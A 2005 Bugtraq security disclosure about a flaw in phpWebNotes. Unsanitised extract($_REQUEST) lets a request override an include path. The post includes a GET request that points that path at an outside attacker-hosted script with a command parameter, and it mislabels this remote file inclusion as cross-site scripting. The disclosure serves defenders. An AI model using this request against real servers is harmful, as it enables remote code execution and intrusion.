| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat, 27 Aug 2005 11:19:22 +0200 From: nf2 <nf2@...einwelt.at> To: bugtraq@...urityfocus.com Subject: XSS security hole in phpwebnotes. Hi security team! I have found a security hole in a popular php application (not maintained anymore). The hole already gets exploited - our server was hacked that way two days ago. Probably hackers just use google to find installations of phpwebnotes. Version: phpWebNotes-2.0.0-pr1.tar.gz (last) ---------------------------------------------------------------------- the bug is in php_api.php line 77: extract($REQUEST); this allowes to change $t_path_core which is used in api.php: require_once( $t_path_core . 'constants_inc.php' ); this can be used for a cross site scripting attack. how does it work: GET http://server/xxxxx/api.php?t_path_core=http://pathtohackingscript?&cmd=id ----------------------------------------------------------------------- http://www.futureware.biz/webnotes/ http://sourceforge.net/projects/webnotes/ regards, Norbert
Powered by blists - more mailing lists